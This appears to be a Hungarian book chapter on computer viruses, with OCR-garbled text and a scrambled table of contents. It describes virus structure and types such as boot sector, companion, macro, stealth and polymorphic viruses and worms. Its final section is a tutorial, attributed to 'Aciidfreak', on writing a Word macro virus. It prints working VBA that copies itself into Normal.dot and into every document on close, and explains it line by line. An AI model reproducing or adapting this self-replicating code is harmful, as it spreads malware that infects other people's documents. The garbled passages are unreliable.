3 Killerprogramok 5.5.4.5.1 Így fertőznek a bootszektor vírusok 5.1.4.4.4.5.4 Modul makrók 5.az elvetemült támadók búvóhelyei? 5.1 Minden ténykedés központja .3 A vírus felépítése Hogyan fertőz meg a vírus egy fájlt? 5.4 Logikai bombák 5.2 Companion vírusok 5.4.11 Férgek .3 Videokártyák .5 Ilyet is lehet: a vírus egy Payload-ot hív meg .10 Update vírusok 5.a Normal.9 TSR fájlvírusok 5.dot fájl 5.8 Stealth vagy rejtőzködő vírusok 5.4.5 Makrovírusok 5.az ILOVEYOU és társai 5.3.2 A dropper vírust helyez el 5.7 Polimorf vírusok 5.4 A legfontosabb vírustípusok rövid áttekintése 5.3 Vírusok kontra ServiceRelease 5.5 Word makrovírus írása 5.4.2 5.5.4.1.1 Alapok 5.2 Modul vagy osztálymodul? 5.2 Miről ismeri fel a vírusvizsgáló a vírust? 5.4.1 Bootszektor vírusok 5.4.1 Defektes cluster mint álcázás 5.5.Tartalom 5.12 Időzítők 5.4.3.6 Hálózati vírusok 5.5.4. fejezet .1.

1 Mi az a féreg? 5.142 A működési mód 5.8.8.7.4 A vírusvédő program kiválasztásának a szempontjai .3 Hogyan tudott a féreg elterjedni? 5.7.1 Szkennermodul 5.7.5.2 Víruspajzs 5.3 „Fertőtlenítő" 5.5.6 A vírus fájltulajdonságokat vagy szövegtartalmakat változtat meg 5.kommentárokkal 5.7 A vírus jelszóval védi a fájlt 5.8.4 A forrás .5.6 5.8.7 Megfertőzött osztálymodulok ILOVEYOU 1385.7.8 Hogyan működnek a vírusvizsgálók? 5.

Az FBI-nak sok szerverrel nem lesz nehéz dolga. az USA fel adta a hivatalos ellenállást.com online média. Az amerikai szövetségi rendőrség.1 Alapok Az FBI kódolás elleni vírust fejleszt Minden eszközzel a potenciális terroristák ellen .jelenti az MSNBC. amely megteremti a dekódolás előfeltételeit. az FBI egy eljárást fejleszt. Csak miután az ipar bizonyítékokat szerzett arról. és elküldi az FBI-nak. 1983-ban programozta az első hivatalosan ismertté vált vírust Fred Cohan a dél-kaliforniai egyetemről. a vírus minden billentyűzet-bevitelt feljegyez. úgy. és rögtön bizonyítékkal is szolgált. hogy kódolás közben kvázi kukucskál a felhasználó válla fölött. mivel az ezekkel kódolt adatokat nem lehet viszszafejteni. Doktori disszertációjához fejlesztette ki az önmagát reprodukáló program elméletét. amellyel a kódolt adatokat már a keletkezésük helyén dekódolni lehet . Az általa .5 Vírusok . Egy Magic Lantern nevű szoftver segítségével az FBI specialistái a jövőben egy olyan vírust tudnak becsempészni a gyanús szerverekre. mielőtt még az adatok kódolása megtörténne.. hogy a kemény kódolóprogramok az exporttilalom ellenére is elterjedtek. A US-hatóságok szemében már régóta tüskét jelentettek az erős kódolásra alkalmas programok. A Magic Lantern azelőtt kezd működni. Ezután a vírus mailben fogja elküldeni magát.Veszélyes fájlok 5. vagy ismert biztonsági réseken becsempészi magát a szerverszoftverbe. Ha a fertőzött számítógépeken elindítanak egy kódolóprogramot..

amelyet interneten. például egy merevlemezre kerül. Ennek ellenére óvatosnak kell lenni: ha hirtelen olyan hibák jelennek meg.3 Videokártyák az elvetemült támadók búvóhelyei? A videokártyák gyakran állnak vírushordozó gyanújában. a szakszerűtlen kezeléstől vagy a hackertámadásoktól. végrehajtható fájlt keres. ami jelentős anyagi károkat okoz. A vírus befészkelődik az adathordozó egy tetszőleges helyére. A hatása az volt. vagy egy destruktív kártevőről. hogy ártalmatlan vírusról van-e szó. A program általában álcázva van. Mivel a komputervírusok a biológiai vírusokhoz hasonlóan viselkednek. A keresés csak az önmagukat kódoló vírusoknál válik problematikussá. egy Word vagy egy Excel fájlról lenne szó. amelyek védik őket a lelepleződéstől. amelyről a vírus felismeri önmagát. Hogy az Offíce-alkalmazások makrovírusai milyen veszélyesek lehetnek. Ez történhet egy olyan fertőzött program elindításával. Az esetleges álcázási eljárás szubrutinja is itt található. A harmadik rész dönti el. hogy meg van-e már fertőzve egy fájl. Itt először egy szubrutinról van-e szó.a bootszektor vírusoknál .2 Miről ismeri fel a vírusvizsgáló a vírust? Minden vírusnak van egy jellemző bitmintája. amely szükség esetén úgy alakítja át a fájlt. hogy a felhasználó felfedezze a vírus elfoglalta tárterületet a merevlemezen.1.4. Ha talál ilyet. Egy vírustámadás következtében azonban bizonyos körülmények között minden adat és program elveszhet. A vírusok állítólag a kártya videomemóriájába fészkelik be magukat.1.2 A vírus felépítése Minden vírus három vagy gyakrabban négy programrészből áll: az első rész egyfajta ismertetőjegy. A legtöbb felhasználói program (tehát a vírusvizsgálók is) egyszerűen átugorják a hibás clustereket. vagy csak jelzik a hibát. amely még nem fertőzött. De ez a hely tartalmazhatná azt a parancsot is.1 Defektes cluster mint álcázás A vírusoknak többnyire álcázómechanizmusaik vannak. . 5. hogy: „a következő újraindításnál formattáld a merevlemezt". mint a vírusoktól és következményeiktől. hogy felismerje. a hex-pattern. A valóságban jelentősen több kár éri a számítógépes rendszereket és az adataikat szabotázsoktól. Ha ez a hex-pattern már ismert. a vírus bemásolja a programkódját a fájlba. ami csak egy kis tréfát csinál.a lemez egy fertőzött bootrutinjával. 5. hogy a rendszer minden felhasználója megkapott minden elérési jogot. hogy a vírus mondjuk x napon rajzoljon egy képet a monitorra. 5. Persze nem vezethető vissza vírusra a számítógéppel történő munka során fellépő hibák mindegyike. az kiderül a későbbiekben. Gyakran éppen az ártalmatlannak vélt fájlok okozzák a legnagyobb károkat. Ebben a részben található a programkód is. amelyek hasonló körülmények között eddig nem léptek fel. Ez hexadecimális karaktereknek egy 10-16 bájt hosszú láncából áll. hogy a vírus a program indításakor azonnal aktiválódni tudjon. vagy . Valójában ez lehetetlen: egy videokártya videomemóriája nem bootképes. és a vírus arra használja. Az újságokban és a televízióban újra és újra horrorisztikus híreket hallani új és veszélyes vírusokról. A vírus az egyik vírushordozóról egy másik potenciális vírushordozóra. akkor vírusellenőrzést kell végezni. Ezek azonban többnyire erőteljes túlzások. vagy írjon ki egy meghatározott szöveget. mintha egy képről. 5. Ennek a segítségével tudja bármikor ellenőrizni. és a megmaradt tárterületet mutatják meg. amely közepes vagy nagy katasztrófát vált ki. itt is az átviteli folyamatot nevezik fertőzésnek. CD-n vagy lemezen keresztül lehet kapni. A második rész tartalmazza a tulajdonképpeni fertőzőrutint. A videokártya memóriáját a vírus legfeljebb egy azonosító tárolására használhatja. az adatokat csak tárolja. Az egyik ilyen mechanizmus például megakadályozza. mert egy EXE fájllal sok felhasználó már eleve óvatosan bánik. fel lehet használni egy meghatározott vírus kereséséhez az adathordozón. és az elfoglalt clustert (helyfoglalási egységet) hibásnak mutatja. fertőzött-e már egy fájl. Ártalmatlan esetben itt található az utasítás. Ezért egyetlen vírus sem tud közvetlenül a videokártya memóriájából a számítógép végrehajtható memóriájába kerülni. A legtöbb esetben a szoftver vagy egy meghajtó hiányosságáról van szó. Fertőzésnek az orvostudomány azt a folyamatot nevezi. amelynél a kórokozók átterjednek egyik egyedről a másikra.programozott vírus Unix operációs rendszer alatt futott.

5. Sok vírus egy futtatható fájl végéhez fűzi a saját programkódját. Ha a vírus nagyobb.A negyedik résszel zárul a kör. hogy azokhoz is hozzáférkőzzön. Minden fertőzésmódnak létezik néhány variánsa. amelyek a bootszektort és a fájlokat is meg tudják támadni. a vírus pedig elrejtőzik valahol az adathordozón. mint a vírus.1 így fertőznek a bootszektor vírusok A vírusok egy másik típusa áthelyezi az eredeti bootszektort. az a saját feladatainak a futtatása előtt először a vírusprogramra ugrik. Ha a gép indításkor a bootszektorhoz ér. akkor kompletten átírja a fájlt. Egy bootszektor vírus a következőképpen terjed. Több módszer kombinációja is gyakran előfordul. 5. a betöltőprogram csak egy jelzést küld a képernyőre: nem rendszerlemez. Ha a programot elindítják. Itt található az a parancs. Többnyire a mailektől óvnak. Ez fontos. ahol a vírus megszakította a program futását.4. Az ilyen figyelmeztetésekben általában azt is megadják. és minden programnál a vírusprogram címét adják meg. A víruskódnak ez a fájlhoz fűzése nem okoz maradandó károsodást a fertőzött fájlon. hogy milyen vírusról van szó.1 Bootszektor vírusok A leggyakrabban fellépő vírusok az olyan bootszektor vírusok. egy vírust telepít a memóriába. és ettől a perctől kezdve még meg nem fertőzött fájlokat keres. mikor a programot elindítják. és megfertőzze őket. amelyeknek a fájlmelléklete vírust rejt. amely utasítja a BlOS-t az operációs rendszer betöltésére. Egyes vírusok azonban sokkal gátlástalanabbul viselkednek. A droppereket egy bizonyos vírus átvitelére alkalmas programként vagy egyszerűen egy szabotázs segédeszközeként írják meg. amellyel a program a víruskód végrehajtása után visszatér oda. ám ha lefut. Ha a bootolási kísérletnél nem talál operációs rendszert. A vírus ezen a módon olyan lemezeken is terjedhet. az elejére pedig egy hivatkozást tesz erre a kódra. illetve a master boot partíciós szektort vagy a DBR-t. Most már minden alkalommal. Más vírusok átírják a FAT-ben található könyvtárinformációt. akkor ez először elindítja a vírust. Ha a gazdaprogram. nem is vírussal fertőzött program. csak fájlokat. A vírust az ilyen lemez is hordozhatja. megint visszaugrik arra a helyre. majd az továbbítja az elérést a helyes címre. Egyes antivírus-programok megkísérlik a dropperek felismerését.3. illetve DOS-bootszektort fertőzik meg a merevlemezen. amelyek nem tartalmaznak programokat.2 A dropper vírust helyez el A dropper nem vírus. Az ilyen vírusok a hajlékonylemezek bootszektorát és/vagy a master boot recordot (MBR). a DOS boot recordot. és annyival meghosszabbítja. 5. Emellett vannak még hibrid vírusok is. a helyére pedig a saját betöltőprogramját írja.4 A legfontosabb vírustípusok rövid áttekintése A vírusfigyelmeztetések szinte már a napi rutinhoz tartoznak az interneten. mint a Form és a Stoned vírus. amennyi helyre szüksége van. mert a „fertőzésveszély" a típustól függően nagyobb vagy kisebb.3 Hogyan fertőz meg a vírus egy fajit? A fájlok megfertőzésénél a legnagyobb különbségek a módban vannak. Ez egy rutin. ezért is lehet egyre nehezebben osztályozni a vírusokat.3. ahol eredetileg megszakította a folyamatot. ugyanolyan méretű vagy nagyobb. s az újabbaknak ez általában sikerül is. 5. mivel a nem bootképes lemezeknek is van egy minimális bootszektoruk. és ezután áttereli a beolvasást az átültetetett eredeti bootszektorra. akkor ez viszonylag észrevétlenül történhet. 5. Ha egy programot elindítanak. Ha ezt végrehajtotta. amennyire a programkódjukhoz szükség van. először a vírus indul el. Az eredeti címeket a vírus egy rendezett listára helyezi. a vírusbetöltő először a vírust indítja el. a merevlemezre vagy egy fájlba. Felhasználóként legfeljebb a fertőzött program indulási sebességének a minimális változását vesszük észre. a fájl. . és egyszerűen átírnak a fájlból annyit. mint a vendéglátója. a vírusokat el lehet távolítani. ahogyan a vírus beveszi magát egy programba. Az alábbiakban egy rövid áttekintést adunk a legfontosabb vírustípusokról és sajátságaikról.

Az. és innentől kezdve az indítási folyamat a megszokott módon folytatódik. Ha ezután megpróbáljuk elindítani az EXE fájlt. csak a lemezek vizsgálatakor tudják felismerni és törölni a bootszektor vírusokat. Mivel azonban fogja a flopiról olvasás/flopíra írás interruptját. de az alapelv mindegyiknél ugyanaz. Ezeket az intéző alapértelmezésben nem mutatja. így a gépünk most minden lemezt megfertőz. Ha ezután elindul a gép a merevlemezről.Kapunk egy flopit adatokkal. A lemez még az A: meghajtóban van. a PC ugyan megfertőződík. Az elrejtéshez gyakran a rejtett vagy a rendszer tulajdonságot adják a fájlnak. előbb vagy utóbb pedig tovább adjuk ezeknek a lemezeknek valamelyikét. ami bekerül az A: meghajtójába. helyette a COM program. mint azt egy döbbent Unix-felhasználó megtapasztalta. A vírus memóriarezidenssé válik. Egyes operációs rendszereknél. és ezt a nevet begépeljük. és a BIOS-ban Boot from Floppy van beállítva: tehát a számítógép megpróbál erről a lemezről elindulni. Ezt az üzenetet már ezerszer láttuk. olvasásról van szó. a DOS először mindig a COM fajit hajtja végre. hogy egy vírus terjed. akitől a lemezt kaptuk. A vírusprogramozónak az a fő előnye. A vírus erre a célra egy fertőzésszámlálót tartalmaz. Betölti a lemez első szektorát a memóriába. működési módjuk miatt. amelyeket kapunk. Kárt azonban ugyanúgy okozhat ezeken a gépeken is. és ebben keresendő a bootszektor vírusok gyakoriságának az oka is. a folytatáshoz üssünk le egy tetszőleges billentyűt amennyiben nem talál rajta DOS-rendszerfájlokat. és a vírus programja lefut. installálja a Stoned vírust a bootszektorába. amelyben benne van a víruskód. tehát kioldjuk a meghajtózárat. és elkezdjük használni az adatait. és ezzel a körforgás elölről kezdődik. 5. a vírus azonban nem tudja a gépbe helyezett lemezekre másolni magát. a vírusprogram minden A: meghajtóra/-ról irányuló írási vagy olvasási műveletnél (habár azt gondoljuk. Ez a flopi azonban Stoned vírussal fertőzött. A boot-támadás idején azonban tehetetlenek. hogy lefuttassa a kódot. második lehetőségként pedig meg lehet adni a CD-ROM meghajtót. amely egy rögzített értéktől kezdve visszaszámol.2 Companion vírusok Ha egy COM és egy EXE fájlnak ugyanaz a neve. a BIOS-t még mindig át lehet állítani egy tiszta(!) lemezről bootolásra. Telepíti magát a merevlemezre. hogy úgy tűnjön. kicseréli magára az MBR-t. hogy a számítógépe és ezáltal a lemez is bootszektor vírussal fertőzött. mint a Stoned vírus. hogy az EXE fájl egyáltalán nem változik. és így a megváltoztatott programok némelyike egyáltalán nem is veszi észre. amelyek nem DOS-alapúak. mikor 2000. Ajánlott a számítógép fő bootszekvenciáját úgy beállítani a BIOS-ban. Ha a vírus befejezte a ténykedését. A következő reggelen újból bekapcsoljuk a számítógépet. de nem sok. A különböző bootszektor vírusok működési módjai a részleteikben ugyan különböznek egymástól. mikor megtudják. és az eredeti MBR-t a merevlemez egy más pontján helyezi el. és ezután betölti az eredeti MBR-t. Ha egy merevlemez-problémánál a bootolás lehetetlenné válna (headcrash vagy hasonló). Ha eléri . még ha ez a kísérlet sikertelen is lenne. Volt néhány igazán sikeres companion vírus. A companion vírusok is ezt a körülményt használják ki. Valamikor kikapcsoljuk a számítógépet. A fertőzött flopik bootszektoráról kerülnek fel a gépre. amit tartalmaz. rátelepszik a 13h interruptra. nehogy másoknak okozzanak károkat továbbadáskor. amelyek a vírussal fertőzöttek. a valóságban a vírus ír a lemezre) megvizsgálja a lemezt. mert abban a pillanatban. és csak így lehet őket továbbadni (egy bootszektor-vírus nem tud például a hálózaton keresztül terjedni). mikor a bootszektor vírus telepíti magát. A bootszektor vírusok PC-ket támadnak meg. 5.4. Sokan meg vannak lepve.4. tehát a vírus fut le. ami mostanra azonban már nem más. Semmi jelentősége nincs annak. hogy először mindig a merevlemezről próbáljon bootolni. A lemezt behelyezzük az A: meghajtóba. az operációs rendszer vagy a védőprogram még egyáltalán nincsen betöltve. hogy egy vírus ilyen módon terjed. és így nem tud terjedni. az EXE fájlhoz készítenek egy azonos nevű COM fájlt. vagy hogy kiírja: Nem rendszerlemez. vagy hogy milyen vírusvédő programot telepítettek rá. A fertőzés csak a fertőzött lemezről történő indítási kísérletnél következhet be. minden a legnagyobb rendben működik. az adathordozóról történő olvasás és írás interruptjára. A vírusvizsgálók. amelyek bizonyos számú fertőzés után tönkreteszik a fertőzött gép merevlemezét. hogy milyen operációs rendszert használ a gép. és ha még nincs megfertőzve. és lenyomunk valamilyen billentyűt.3 Killerprogramok A killerprogramok olyan vírusok. március 6-án a Michelangelo vírus meglepetésszerűen lecsapott a gépére. lefut az MBR. Eddig a vírus még semmit sem csinált. például készített egy újabb companion vírust egy újabb fájlhoz. azonban nem tudja. elindítja az EXE programot is. A lemezeket. ennek ellenére gondosan ellenőrizzük vírusvizsgálóval.

valószínűleg egy e-mail mellékletével vagy egy barátja demólemezével. amelyek ezáltal ugyancsak megfertőződnek.4. Az ILOVEYOU a maga idejében pontosan ilyen vírus volt. A makrovírusok például egy másikra tudják cserélni a Mentés parancsot. „A" kolléga néhány programot a hálózaton futtat. 6. mint lokálisan. Egyes esetekben a vírus ilyenkor kiadja és lefuttatja a FORMÁT C: parancsot. A vírusok. Amint megnyitunk egy fertőzött Word dokumentumot.. mindig egy rendszer gyenge pontjaira vannak kihegyezve. Ezek a vírusok többnyire egy meghatározott rendszerre korlátozódnak: a bombák rendszerint csak egy megadott környezeten belül tudják reprodukálni magukat. amelyek adatfájlokat fertőznek meg. A legtöbben azt hiszik.4 Logikai bombák A logikai bombák a vírusok különleges fajtái: ezeknek a működésbe lépését kiválthatja egyfajta időzítő vagy egy feltétel teljesülése. A klasszikus hálóvírusok az úgynevezett férgek. ezek is megfertőződnek. amelyek elküldik magukat a mail-címjegyzék minden címére. és minden rendszer más programozási követelményeket állít. és végrehajt egy fertőzött fájlt. Ezek a vírusok nem programfüggelékként terjednek a rendszerekben.dot fájlt. az a későbbiekben fog kiderülni.5 Makrovírusok A makrovírusok olyan vírusok. milyen parancsokat tudnak kiváltani. a koncepciójuknál fogva. még akkor sem. A fájlvírusok ezzel szemben a következőképpen fertőznek hálózaton keresztül: 1. Más sajátosságai mellett saját magát szaporította. 7. A különböző címjegyzék-bejegyzéseken keresztül a vírus gyorsan eljut az üzletfelekhez. és a címjegyzékéből minden kollégája kap egy mailt a vírussal. amelyek például Mac és MS-DOS gépeken is tudnának működni. Mivel ezek minden rendszerben mások.4. mert ez a vírustípus csak flopin keresztül terjed. 5. Valamennyi végrehajtott fájl megfertőződik. hálózatra csatlakozó számítógép fertőzött. A vírus „B" kolléga gépén is memóriarezidens lesz. ha több. helyi merevlemezén és a szerveren. és így lavinát vált ki. Hogy a makrovírusok hogyan működnek. azonnal viharos sebességgel el is terjed rajta. hogy a szerveren is meg tudjon fertőzni fájlokat. és ezért ezen a környezeten kívül hatástalanok. amint bekerül egy hálózatba. Ha ezek a kollégák ugyancsak megnyitják a mellékletet. az is megfertőződik a vírussal. Ha ezután egy dokumentumot mentünk vagy nyitunk.. „A" kolléga további programokat futtat a merevlemezén. minden kezdődik elölről. Itt elég.6 Hálózati vírusok Speciális hálózati vírusokból még kevés van. csak az adatállomány többé nem olvasható és használható. „A" kolléga megfertőzi a számítógépét.4. Másképp történik a fertőzés az olyan vírusoknál. ez azt jelenti. „B" kolléga több más programot futtat saját. kiváltja a rombolóakciót.a nullát. . A vírus memóriarezidenssé válik. Más vírusok minden fájlt törölnek az adathordozón. „C". Ez azonban a valóságban sokkal bonyolultabb. „D" és „E" kollégák bejelentkeznek. A legbarátságtalanabb változat a FAT bejegyzéseit változtatja meg. hogy egy vírus. barátokhoz stb.doc vagy . még nincsenek. a felhasznált programnyelv alapján adatokat tudnak törölni vagy módosítani. és milyen trükköket vetnek be álcázásként. és futtatják a ferőzött fájlokat. A vírusnak tehát nem kell a szokásostól eltérően viselkednie ahhoz. ha „A" kolléga lefuttatja a fájlt. A hálózat egy DOS-eszközt emulál.. amelyek több operációs rendszerben is tudnának terjedni. például egy bizonyos szó vagy felhasználói név beírása vagy hiánya.dot végződéssel) és már Excel fájlokban is találunk. 5. 5. belátható időn belül aligha lesznek olyan vírusok. hogy fájlok olvasása és írása ugyanolyan módon történik a szerveren. hanem önállóan tudják reprodukálni a saját kódjukat. 4. az megfertőzi a Normal. azonban a legtöbb vírus hálózaton is tud terjedni. 5. Még kompu- . és önálló programként tudják lefuttatni magukat. Ilyenkor minden fájl ott marad ugyan a merevlemezen. Először is a bootszektor vírusok nem tudnak hálózaton keresztül terjedni. 3. „B" kolléga bejelentkezik a szerverre. Olyan vírusok. Makrovírusokat jellemzően Microsoft Word dokumentumokban (. 2.és így tovább.

Ha igen. hogy minden program. amelyek ugyanazt a bájtsorozatot tartalmaznák. bár ez az esetek 99%-ára igaz. 5. Ahhoz. fájlokat. hasonló trükkel szintén el tudják titkolni a létezésüket úgy. hogy milyen fájlok állnak rendelkezésre az adathordozón (pl. amely ellenőrzi. amelyeknek nincs szükségük arra. valakinek le kell futtatni a fertőzött programot. hanem egy update rutint is. amit a meghajtó tartalmaz. ennél sokkal összetettebb és nehezebb feladatot kell megoldania annak.9 TSR fájlvírusok A második leggyakoribb vírusfajta a TSR fájlvírus.8 Stealth vagy rejtőzködő vírusok Ha egy vírus memóriarezidenssé tud válni.az ILOVEYOU és társai A komputerférgek olyan programok. 5. ezek az *.4. Egyes vírusokat gyorsan fertőző vírusoknak is neveznek. akkor ezzel nem fertőz újra. amelyeket az a vírusfertőzés előtt tartalmazott.4. A vírusprogramozó ezt a programot szeretné a legjobban becsapni. az ilyen típusú vírus fájlokat támad meg. mert egy bootszektor vírushoz sokkal egyszerűbb álcázórutint írni. hogy megfertőzze. Hi-hi. ha az még nem fertőzött. mert a mailforgalom egyfolytában növekedett. Ezért egy ilyen vírust nem lehet egyszerűen egy meghatározott bájtsorozatról felismerni.10 Update vírusok Az update vírusok különösen ravasz kórokozók. Egyes vírusok overlay fájlokat (programok lapozófájljai) fertőznek meg. Használnak még más fertőzőrutinokat is. A Green Caterpiller fertőzőrutinját viszont minden olyan folyamat kiváltja. akkor az a 13h interruptot használja (az adathordozók olvasása/írása). de a legtöbb esetben egy program csak akkor fertőződik meg. a vírus azt mondja magában: „Aha. hogy egy TSR vírus terjedni tudjon. A hex pattern mellett ezek a vírusok nemcsak egy verziószámot tartalmaznak. Családokra oszlanak." Ezáltal a lekérdező programnak semmi szokatlan sem tűnik fel. amely meghatározza. 5. amely a víruskódok egy bizonyos repertoárja után kutat. hanem azzal rokon zavaróprogramokról. A fájlvírusok. ha egy tetszőleges program megpróbálja olvasni a bootszektort.4.4. 5. amelyik ezzel a trükkel dolgozott. mint fájlvírusoknál. amelyek azonban vírust is tartalmazhatnak. és minden további futtatás ismét elindította a küldést. Többnyire több. A polimorf vírus olyan kártevő. Az ilyen vírusok már akkor megfertőznek egy fájlt. mint amilyen a Frodo. ha csak megnyitjuk azt (például egy adatmentésnél bizonyos körülmények között minden fájlt megnyitnak. és aztán a fertőzött bootszektor helyett az eredeti tartalmát prezentálom.tercégeknél is egész részlegeket bénított meg. azok közül is általában a COM és az EXE . amelyből egy helyen nem fordul elő két másolat. a DIR parancs). és általában minden utána elindított programot megvizsgál.OVL fájlok. Az ilyen álcázási képességek azonban gyakrabban figyelhetők meg bootszektor vírusoknál. és a végrehajtható programoknak sem feltétlenül kell COM vagy EXE kitérjesztésűeknek lenniük.11 Férgek . A vírus memóriarezidenssé válik. egymáshoz kapcsolódó programszegmensből állnak. Ha újabb verzió van telepítve. De ez még nem minden: a rutin azt is megvizsgálja. hogy a fájlok tartalmazzák-e már a vírus egy régebbi verzióját. 5. ami pedig a komputeres világban megjelenő vírusok 99%-ára igaz. Mint a neve is mutatja. amely a fájlt olvassa. Ha bootszektor vírusról van szó. akkor legalább egy interruptot fogni tud. amikor végrehajtják. Az 1986-ban készült Éráin vírus volt az első olyan. akkor lecseréli ezeket.) Az első gyorsan fertőző vírus a Dark Avenger volt. Egyszerűen beolvasom az eredeti bootszektort onnan. Ezeknél nem klasszikus vírusról van szó. csak azokat a bájtokat látja. és ezeket többnyire egyetlen programozó vagy egy csoport fejleszti. aki el akarja csípni. és hálózati funkciók segítségével más számítógépekre másolódnak. azonban van néhány eszközmeghajtó vírus is.4.7 Polimorf vírusok Az antivírus programok leggyakrabban használt fajtája a szkenner. A férgek önálló programok. A stealth vírusoknál viszont. A komputerférgek saját magukat tudják reprodukálni. hogy gazdaprogramokhoz fűzzék magukat. ahová eltettem. itt valaki látni akarja a bootszektort. amelyek önállóan tudnak egy hálózaton terjedni. hogy a vírus fellépett-e már valamely verziójában.

még nem fertőzött DOCfájlba.VBProject. esetleg UserFormról lesz-e szó. hogy a makrók engedélyezésére kattintott. De a Word idegen szövegeknél megkérdezi. amely a szóban forgó napon automatikusan elindul. amelyeket bárhol újra elő lehet venni. amelyek azután minden dokumentumra érvényesek.Export "c:\demo. 5. VBComponents(" demo"). kiváltja a vírus akciótartalmának a végrehajtását. és a Normal. és milyen potenciális veszélyeket hordoznak ezek.Count . A következő oldalakon sok minden kiderül a Word makrovírusok programozásáról. 5. Aki tud VB-ben programozni. ezért kell a fertőzéshez a Normal.5.dot-ot. amelynek a sablonjában makrók voltak. Attribute VB_Name = "demo" On Error Resume Next Application. Minden parancsnak a birtokában van. Ez a kérdés azonban csak erre a dokumentumra érvényes. hogy az egészet csak tájékoztatásnak szánjuk.4. hogy milyen trükkökkel álcázhatják a programozók a programjaikat. A UserFormok a makroprogramozás szempontjából nem érdekesek. Elméletileg így például születésnapi üdvözletet lehet valakinek küldeni. a Normal.2 Modul vagy osztálymodul? A vírusok mindig egy osztálymodulban vagy egy modulban vannak. akkor ezek a fájl megnyitásakor rendszerint ugyancsak megnyílnak és aktívvá válnak.sys" 5. ha valakitől egy olyan dokumentumot kapott.3 Vírusok kontra ServiceRelease Az SR-1 a Microsoft egy ServiceRelease-e. hogy milyen veszély bújik meg mögöttük. de hatalmas. annak nagyon egyszerű a makrók írása. Ez a makrovírus alapÖtlete. hogy Modulról vagy Osztálymodulról.5 Word makrovírus írása Biztos. amit a VB alatt is használni tudunk. valamennyire módosított formában.4 Modul makrók Az alábbiakban megtalálható minden. Ezekbe kerülnek az önálló projektrészek. ugyanabban az órában indul el. a modulok és az osztálymodulok a fontosak.dot fájl A Word minden indításkor betölt egy globális fájlt. vagy kétkedőn a tiltásukat választotta. 5. Ezt a fájlt támadják meg. Ha az elér egy rögzített értéket. 5. amely minden nap. de hangsúlyozzuk.5. A naptári dátumok mellett olyan rutint is lehet használni. A VBA lassú.ActiveVBProject. Egy modul elkészítéséhez az Eszközök/Makró/Visual Basic-kel megnyitjuk a Word makroszerkesztőjét. nem pedig megvalósítás céljára. Ha ezzel valaki meg tud úszni egy Word makrovírust vagy legalább felismeri azt. Itt különösen fontos tudni.dot-ból minden. A feltétel lehet a bekapcsolástól számított időtartam vagy egy előre meghatározott dátum. Íme. Itt a Beszúrás menüből kiválasztjuk. hogy mindenki látta már a Word megerősítő kérdését. de biztosan nem volt a tudatában annak. amire egy Word makrovírushoz szükség van. de egy vírusíró erre mindig talál megoldást. a vírusspecialista Aciidfreak útmutatója. amely a WordBasicben elérhetetlenné teszi a MacroCopy és Application OrganizerCopy parancsokat. már megérte az ismertetés. A vírusprogramon belül egy rutin lekérdezi a rendszeridőt. hogy a Wordot megfertőzzék.5.5. Ebben a fájlban lehetnek a makrók.VBComponents.5. Sub AutoCloseQ For I = 1 To NormalTemplate. VBE. és minden API-funkciót is ismer (API = Application Programming Interface).dot-ba másolni a makrovínisokat. hogy aktiválja-e a makrókat is.a Normal. Lehet. Ha a Word fájlok makrót tartalmaznak.12 Időzítők Az időzítők a vírusok speciális kioldómechanizmusai.1 Minden ténykedés központja . Először a modulokban lévő makrovírusokkal foglalkozunk. Az időzítők feltételeinek a választéka szinte határtalan.

amelyek automatikusan végrehajtódnak: például AutoOpen.Export "c: \demo.sys fájlba exportálja. VBProject. VBProject Dobj.dot-ba. True-ra állítja az Activlnstall-t.Name = "demo " Then Normlnstall = True Ha a Normal.VBProject. Ebben a fájlban benne van az egész forráskód. Vannak még más autofunkciók is. For I = 1 To NormalTemplate. VBCpmponents(I).Import ("c: \demo. VBProject. Application. Sub AutocloseQ Ez a sub minden alkalommal lefut. VBComponents ("demo").VBComponents(I). ami elárulná a vírust. VBComponents. Next I A For cikluson belül a következő értékre lépteti a ciklusváltozót. hogy hibaüzenetet írna ki. Else If ActivInstall = False And Normlnstall = True Then Set Dobj = ActiveDocument. VBProject. VBComponents(I).VBProject. Most néhány funkció következik. hogy mire lett állítva a Dobj. VBComponents.VBComponents. Ha hiba lépne fel.Import ("c:\demo. AutoExit. ahelyett. Dobj. mint a vírusé). If NormalTemplate.dot-ban vagyunk. On Error Resume Next Ez esetleg a VB-ből már ismert.ActiveVBProject. VBProject Itt a feltétel fordítva is átfut: Ha a Normal. VBComponents.dot-on keresztül célzottan másolni is lehet a makrókat. vagy az aktív dokumentumba. VBProject Ha az aktív dokumentumban.VBCpmponents(I). amelynek a neve „demo" (tehát.VBComponents.sys") Itt importálja az elején exportált fájlt (a vírust). ezenkívül a Normal. És a modul neve általában a vírus neve. Annyiszor ismétli az utána következő kódot. True-ra állítja a NormalInstall-t. ha egy dokumentumot bezárnak. VBProject-re lesz állítva. hogy később lehetőleg egy fertőzendő fájlba lehessen importálni.dot-ban és nem az aktív dokumentumban vagyunk. VBProject_ Else If ActivInstall = False And Normlnstall = True Then Set Dobj = ActiveDocument. Annyiszor ismétli meg a For és a Next közötti kódot. amelyeket be lehet építeni. Autoexec.dot-ban.sys" A modult a C\demo. egyszerűen a következő parancsot hajtatja végre. hogy később kiváltsa az aktív dokumentumba importálást.VBProject.If NormalTemplate. Next I A For cikluson belül a következő értékre lépteti a ciklusváltozót. ahány modul található az aktív dokumentumban. If ActivInstall = True And Normlnstall = False Then Set Dobj = NormalTemplate. Attribute VB_Name = "demo" A Demo a modul neve.Name NormInstall = True Next I = "demo" Then For I = l To ActiveDoctiment.Count Ez egy For ciklus. VBE. Hogy melyik fájlba lesz csomagolva. IfActiveDoaiment. For I = 1 To ActiveDocument. és nem a Normal. Az álcázás . akkor a Dobj NormalTemplate.sys") End Sub így ni. akkor a Dobj-t NormalTemplate. Itt rögzíti.stealth A Word alapértelmezésben megmutat egy modult a VB Editorban. Az álcázáshoz .dot-ban van egy modul. ahány modul van a Normal. hogy később melyik fájlba importál: vagy a Normal.VBProject. az attól függ. amit demo-nak hívnak (tehát a vírus).Count If ActiveDocument.Name = "demo" Then ActivInstall = True Next I If ActivInstall = True And Normlnstall = False Then Set Dobj = NormalTemplate. Count Ez egy For ciklus. ezt most fogjuk most darabokra szedni.Name = "demo" Then ActivInstall = True Ha az aktív dokumentumban van egy modul. VBProject-re állítja.

